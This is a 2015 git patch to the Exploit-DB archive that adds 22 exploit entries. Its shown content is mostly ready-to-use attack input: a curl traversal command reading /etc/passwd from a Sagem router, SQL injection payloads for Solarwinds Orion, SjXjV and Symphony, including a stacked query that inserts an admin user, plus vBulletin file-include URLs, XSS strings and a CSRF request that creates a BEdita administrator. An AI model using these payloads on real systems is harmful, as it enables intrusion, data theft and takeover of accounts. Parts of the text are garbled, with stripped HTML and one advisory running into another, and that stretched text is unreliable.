From b109a86d7a8fff905f49011283321f6a3186aaa6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Mar 2015 08:35:37 +0000 Subject: [PATCH] Update: 2015-03-06 22 new exploits --- files.csv | 22 ++ platforms/hardware/webapps/36241.txt | 21 ++ platforms/jsp/webapps/36275.txt | 221 +++++++++++++++++ platforms/lin_amd64/dos/36266.c | 155 ++++++++++++ platforms/linux/dos/36267.c | 161 ++++++++++++ platforms/linux/dos/36268.c | 107 ++++++++ platforms/linux/local/36229.py | 48 ++++ platforms/linux/remote/36263.rb | 243 ++++++++++++++++++ platforms/osx/dos/36271.py | 43 ++++ platforms/php/remote/36264.rb | 354 +++++++++++++++++++++++++++ platforms/php/webapps/36230.txt | 37 +++ platforms/php/webapps/36259.txt | 11 + platforms/php/webapps/36265.txt | 118 +++++++++ platforms/php/webapps/36269.txt | 11 + platforms/php/webapps/36270.txt | 7 + platforms/php/webapps/36272.txt | 9 + platforms/php/webapps/36273.txt | 23 ++ platforms/php/webapps/36277.txt | 7 + platforms/php/webapps/36278.txt | 15 ++ platforms/php/webapps/36280.txt | 9 + platforms/php/webapps/36281.txt | 9 + platforms/windows/dos/36260.txt | 58 +++++ platforms/windows/webapps/36262.txt | 142 +++++++++++ 23 files changed, 1831 insertions(+) create mode 100755 platforms/hardware/webapps/36241.txt create mode 100755 platforms/jsp/webapps/36275.txt create mode 100755 platforms/lin_amd64/dos/36266.c create mode 100755 platforms/linux/dos/36267.c create mode 100755 platforms/linux/dos/36268.c create mode 100755 platforms/linux/local/36229.py create mode 100755 platforms/linux/remote/36263.rb create mode 100755 platforms/osx/dos/36271.py create mode 100755 platforms/php/remote/36264.rb create mode 100755 platforms/php/webapps/36230.txt create mode 100755 platforms/php/webapps/36259.txt create mode 100755 platforms/php/webapps/36265.txt create mode 100755 platforms/php/webapps/36269.txt create mode 100755 platforms/php/webapps/36270.txt create mode 100755 platforms/php/webapps/36272.txt create mode 100755 platforms/php/webapps/36273.txt create mode 100755 platforms/php/webapps/36277.txt create mode 100755 platforms/php/webapps/36278.txt create mode 100755 platforms/php/webapps/36280.txt create mode 100755 platforms/php/webapps/36281.txt create mode 100755 platforms/windows/dos/36260.txt create mode 100755 platforms/windows/webapps/36262.txt diff --git a/files.csv b/files.csv index ee4797e54..2637071ab 100755 --- a/files.csv +++ b/files.csv @@ -32656,6 +32656,8 @@ id,file,description,date,author,platform,type,port 36226,platforms/php/webapps/36226.txt,"SilverStripe 2.4.5 Multiple Cross-Site Scripting Vulnerabilities",2011-10-11,"Stefan Schurtz",php,webapps,0 36227,platforms/php/webapps/36227.txt,"Joomla! Sgicatalog Component 1.0 'id' Parameter SQL Injection Vulnerability",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 +36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0 +36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0 @@ -32665,6 +32667,7 @@ id,file,description,date,author,platform,type,port 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0 +36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0 36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0 @@ -32680,3 +32683,22 @@ id,file,description,date,author,platform,type,port 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 +36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 +36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability",2011-10-28,"Marcel Bernhardt",windows,dos,0 +36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443 +36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80 +36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 +36266,platforms/lin_amd64/dos/36266.c,"Linux Kernel IRET Instruction #SS Fault Handling - Crash PoC",2015-03-04,"Emeric Nasi",lin_amd64,dos,0 +36267,platforms/linux/dos/36267.c,"Linux Kernel PPP-over-L2TP Socket Level Handling - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 +36268,platforms/linux/dos/36268.c,"Linux Kernel Associative Array Garbage Collection - Crash PoC",2015-03-04,"Emeric Nasi",linux,dos,0 +36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 'post.php' SQL Injection Vulnerability",2011-10-28,"599eme Man",php,webapps,0 +36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 'p48-search.html' Cross Site Scripting Vulnerability",2011-10-28,"599eme Man",php,webapps,0 +36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0 +36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 +36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0 +36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 +36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0 +36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 +36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 +36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 diff --git a/platforms/hardware/webapps/36241.txt b/platforms/hardware/webapps/36241.txt new file mode 100755 index 000000000..debab8eb8 --- /dev/null +++ b/platforms/hardware/webapps/36241.txt @@ -0,0 +1,21 @@ +# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability +# Vendor : http://www.sagemcom.com +# Severity : High +# Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) +# Date : 2015-03-01 +# Author : Loudiyi Mohamed +# Contact : Loudiyi.2010@gmail.com +# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 + +# Vulnerability description: +Sagem Fast is an ADSL Router using a web management interface in order to change configuration +settings. The router is Sagem Fast is an ADSL Router using a web management interface in order +to change configuration settings. +The web server of the router is vulnerable to directory traversal which allows reading files +by sending encoded '../' requests. + +The vulnerability may be tested with the following command-line: +curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd +Or directly from navigateur: +http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd +http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp diff --git a/platforms/jsp/webapps/36275.txt b/platforms/jsp/webapps/36275.txt new file mode 100755 index 000000000..948394b8a --- /dev/null +++ b/platforms/jsp/webapps/36275.txt @@ -0,0 +1,221 @@ +source: http://www.securityfocus.com/bid/50456/info + +Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities. + +An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown. + +These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. + +Proof of Concept: +================= +The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts. +For demonstration or reproduce ... + +1.1 +Code Review: HQ Roles [IVE - Persistent] + + + + +Dashboard Name: + +New Role Dashboard + + + + + +Code Review: java.security.krb5.kdc Module: HQ Health / HQ Process Information & Diagnostics [IVE - Persistent] + +- java.rmi.server.codebase = http://h1461735:9093/ +- java.rmi.server.hostname = h1461735 +- java.runtime.name = Java(TM) SE Runtime Environment +- java.runtime.version = 1.6.0_13-b03 +- java.security.krb5.kdc = >" +- java.security.krb5.realm = >" +- java.specification.name = Java Platform API Specification +- java.specification.vendor = Sun Microsystems Inc. +- java.specification.version = 1.6 +- java.vendor = Sun Microsystems Inc. + +.../PoC/printReport(poc).hqu + + + +Code Review: Browse - Monitor - Indikators [IVE - Persistent] + + +hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000"); +hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807"); + + +HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> + + + + >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> + + &data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user], + +your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user], + +you+have+been+unsubscribed+from "[$title]" + +The parameter data[MailGroup][group_name] is vulnerable to XSS. + +2) CSRF in user creation page + +When an authenticated administrative user of BEdita CMS is creating an user, the following POST request is sent to the server: + +POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/users/saveUser HTTP/1.1 +Host: 127.0.0.1 +Proxy-Connection: keep-alive +Content-Length: 339 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/users/viewUser +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8 +Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132 + +data[User][auth_type]=bedita&data[User][userid]=csrfadmin99&data[User][auth_params][userid]=&pwd=1qazXSW@&data[User][passwd]=1qazXSW@&data[User][realname]=csrfadmin99&data[User][email]=csrfadmin99@admin.com&data[User][valid]=1&groups=&data[groups][administrator]=on + +By executing the following Proof-of-Concept, a new user called "csrfadmin99" will be created with the password "1qazXSW@". + + + +
+ + + + + + + + + +
+ + + +---------------------------------------------------------------- + +Impact: + +1) An attacker is able to leverage on the XSS vulnerability to exploit users of BEdita. An example would be to Inject malicious JavaScript code in order to use attacking tools like BeEF. +2) An attacker is able to create an user account with administrator privilege. + +---------------------------------------------------------------- + +Solution: + +Update to the latest version, which is 3.5.1, see https://groups.google.com/forum/?fromgroups#!topic/bedita/SOYrl5C-YRg + +---------------------------------------------------------------- + +Timeline: + +Vulnerability found: 11.2.2015 +Vendor informed: 11.2.2015 +Response by vendor: 11.2.2015 +Fix by vendor 19.2.2015 +Public Advisory: 1.3.2015 + +---------------------------------------------------------------- + +References: +https://github.com/bedita/bedita/issues/591 +https://github.com/bedita/bedita/issues/597 + +---------------------------------------------------------------- + diff --git a/platforms/php/webapps/36269.txt b/platforms/php/webapps/36269.txt new file mode 100755 index 000000000..a16ddd911 --- /dev/null +++ b/platforms/php/webapps/36269.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/50426/info + +SjXjV is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +SjXjV 2.3 is vulnerable; other versions may also be affected. + +http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29-- + +http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/36270.txt b/platforms/php/webapps/36270.txt new file mode 100755 index 000000000..e8cfb85e1 --- /dev/null +++ b/platforms/php/webapps/36270.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50428/info + +Plici is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/l1/p48-search.html[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36272.txt b/platforms/php/webapps/36272.txt new file mode 100755 index 000000000..17cb9eab2 --- /dev/null +++ b/platforms/php/webapps/36272.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50454/info + +Domain Shop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/index.php +Search Box +"> \ No newline at end of file diff --git a/platforms/php/webapps/36273.txt b/platforms/php/webapps/36273.txt new file mode 100755 index 000000000..c8f2237da --- /dev/null +++ b/platforms/php/webapps/36273.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/50455/info + +vBulletin is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +vBulletin 4.1.7 is vulnerable; other versions may also be affected. + +http://www.example.com/vB1/api.php?api_script=[RFI] +http://www.example.com/vB1/payment_gateway.php?api[classname]=[RFI] +http://www.example.com/vB1/admincp/cronadmin.php?nextitem[filename]=[RFI] +http://www.example.com/vB1/admincp/diagnostic.php?match[0]=[RFI] +http://www.example.com/vB1/admincp/diagnostic.php?api[classname]=[RFI] +http://www.example.com/vB1/admincp/plugin.php?safeid=[RFI] +http://www.example.com/vB1/includes/class_block.php?file=[RFI] +http://www.example.com/vB1/includes/class_humanverify.php?chosenlib=[RFI] +http://www.example.com/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[RFI] +http://www.example.com/vB1/includes/functions.php?classfile=[RFI] +http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI] +http://www.example.com/vB1/vb/vb.php?filename=[RFI] +http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI] +http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI] +http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/36277.txt b/platforms/php/webapps/36277.txt new file mode 100755 index 000000000..d4b886eba --- /dev/null +++ b/platforms/php/webapps/36277.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50468/info + +IBSng is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/IBSng/util/show_multistr.php?str=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36278.txt b/platforms/php/webapps/36278.txt new file mode 100755 index 000000000..651e45a1e --- /dev/null +++ b/platforms/php/webapps/36278.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/50469/info + +eFront is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied input + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. + +http://example.com/administrator.php?ctg=%22%20stYle=%22x:expre/**/ssion(alert(9))%20&user=admin&op=dashboard + +http://example.com/administrator.php?ctg=personal&user='%20stYle=x:expre/**/ssion(alert(9))%20ns='%20&op=dashboard + +http://example.com/administrator.php?ctg=calendar&view_calendar=%22%20stYle=x:expre/**/ssion(alert(9))%20ns=%22 + +http://example.com/index.php?ctg=lesson_info&lessons_ID=2&course='%20stYle='x:expre/**/ssion(alert(9)) \ No newline at end of file diff --git a/platforms/php/webapps/36280.txt b/platforms/php/webapps/36280.txt new file mode 100755 index 000000000..855defc92 --- /dev/null +++ b/platforms/php/webapps/36280.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50470/info + +Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Symphony versions prior to 2.2.4 are vulnerable. + +http://example.com/symphony/publish/images/?filter='"--> \ No newline at end of file diff --git a/platforms/php/webapps/36281.txt b/platforms/php/webapps/36281.txt new file mode 100755 index 000000000..ac3b4d6f2 --- /dev/null +++ b/platforms/php/webapps/36281.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50470/info + +Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Symphony versions prior to 2.2.4 are vulnerable. + +http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+' \ No newline at end of file diff --git a/platforms/windows/dos/36260.txt b/platforms/windows/dos/36260.txt new file mode 100755 index 000000000..2655e6bd9 --- /dev/null +++ b/platforms/windows/dos/36260.txt @@ -0,0 +1,58 @@ +source: http://www.securityfocus.com/bid/50421/info + +The Opera Web Browser is prone to a denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected application, denying service to legitimate users. + +Opera Web Browser 11.52 is vulnerable; other versions may also be affected. + + diff --git a/platforms/windows/webapps/36262.txt b/platforms/windows/webapps/36262.txt new file mode 100755 index 000000000..32c727592 --- /dev/null +++ b/platforms/windows/webapps/36262.txt @@ -0,0 +1,142 @@ +I found a couple SQL injection vulnerabilities in the core Orion service +used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This +service provides a consistent configuration and authentication layer across +the products. + +To be exact, the vulnerable applications and versions are: + +Network Performance Monitor -- < 11.5 +NetFlow Traffic Analyzer -- < 4.1 +Network Configuration Manager -- < 7.3.2 +IP Address Manager -- < 4.3 +User Device Tracker -- < 3.2 +VoIP & Network Quality Manager -- < 4.2 +Server & Application Monitor -- < 6.2 +Web Performance Monitor -- < 2.2 + +At first glance, the injections are only available to admins, as the +requests used are on the Manage Accounts page. However, it seems there is +no real ACL check on the GetAccounts and GetAccountGroups endpoints of the +AccountManagement.asmx service, which means that even authenticating as +Guest allows for exploitation. By default, the Guest account has no +password and is enabled. + +On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and +'dir' parameters are susceptible to boolean-/time-based, and stacked +injections. By capturing the AJAX requests made by an admin user to these +endpoints, authenticating as Guest and replacing the admin cookie with the +Guest cookie, you can still make a successful request, and thus a +successful exploitation vector for any authenticated user. + +Being a stacked injection, this becomes a privilege escalation at the very +least, as an attacker is able to insert their own admin user. A pull +request for a Metasploit module which should achieve this on any product +using the Orion service as the core authentication management system, using +the GetAccounts endpoint, has been made ( +https://github.com/rapid7/metasploit-framework/pull/4836). By default, the +module attempts to authenticate as the Guest user with a blank password, +then exploit the SQL injection to insert a new admin with a blank password. + +I am not sure if the non-trial versions allow you to specify your own SQL +server, but the trials install a SQL Server Express instance. The SQL user +that the application uses is not an administrator, and the xp_cmd_shell +stored procedure is unavailable. + +Within the GetAccounts endpoint: + +Parameter: dir (GET) + + Type: boolean-based blind + Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause + Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791) +THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM +master..sysdatabases) END)) + + Type: stacked queries + Title: Microsoft SQL Server/Sybase stacked queries + Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'-- + + Type: AND/OR time-based blind + Title: Microsoft SQL Server/Sybase time-based blind + Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'-- + + +Parameter: sort (GET) + + Type: boolean-based blind + Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter +replace (original value) + Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN +CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68) +ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC + + Type: stacked queries + Title: Microsoft SQL Server/Sybase stacked queries + Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC + + Type: AND/OR time-based blind + Title: Microsoft SQL Server/Sybase time-based blind + Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC + + + +Within the GetAccountGroups endpoint, very similar injection techniques are +available: + +Parameter: dir (GET) + + Type: boolean-based blind + Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause + Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN +(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM +master..sysdatabases) END)) + + Type: stacked queries + Title: Microsoft SQL Server/Sybase stacked queries + Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'-- + + Type: AND/OR time-based blind + Title: Microsoft SQL Server/Sybase time-based blind + Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'-- + + +Parameter: sort (GET) + + Type: boolean-based blind + Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter +replace (original value) + Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN +CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121) +ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC + + Type: stacked queries + Title: Microsoft SQL Server/Sybase stacked queries + Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC + + Type: AND/OR time-based blind + Title: Microsoft SQL Server/Sybase time-based blind + Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC + + +An example injection to insert an admin user named notadmin with a blank +password using the 'dir' parameter would be: + +ASC;insert into accounts values ('notadmin', '127-510823478-74417-8', +'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', +'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0, +0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', +0, ''); + +This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was +assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of +Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock, +Group Product Manager – Network Management at Solarwinds for the easy +coordination (you should still have a bug bounty though!). + +i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends? + +i dub thee Molarfriends vulnerability. wheres my markketing tem... + +-- +http://volatile-minds.blogspot.com -- blog +http://www.volatileminds.net -- website